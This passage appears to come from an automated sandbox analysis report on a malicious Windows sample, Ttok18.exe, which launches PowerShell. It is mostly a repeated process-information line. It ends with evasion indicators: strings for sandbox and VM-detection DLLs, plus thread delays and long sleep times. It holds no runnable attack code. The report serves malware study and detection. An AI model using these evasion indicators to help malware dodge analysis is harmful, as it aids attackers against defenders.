            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exeBinary or memory string: DIR_WATCH.DLL
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exeBinary or memory string: SBIEDLL.DLL
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exeBinary or memory string: API_LOG.DLL
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drBinary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8
            Source: C:\Users\user\Desktop\Ttok18.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeWindow / User API: threadDelayed 1731Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeWindow / User API: threadDelayed 8081Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 997Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 426Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7805Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1806Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1220Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 703Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8017Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1575Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1081Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6238Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3509Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -99797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -99672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -99563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -99438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -99313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -99188s >= -30000sJump to behavior
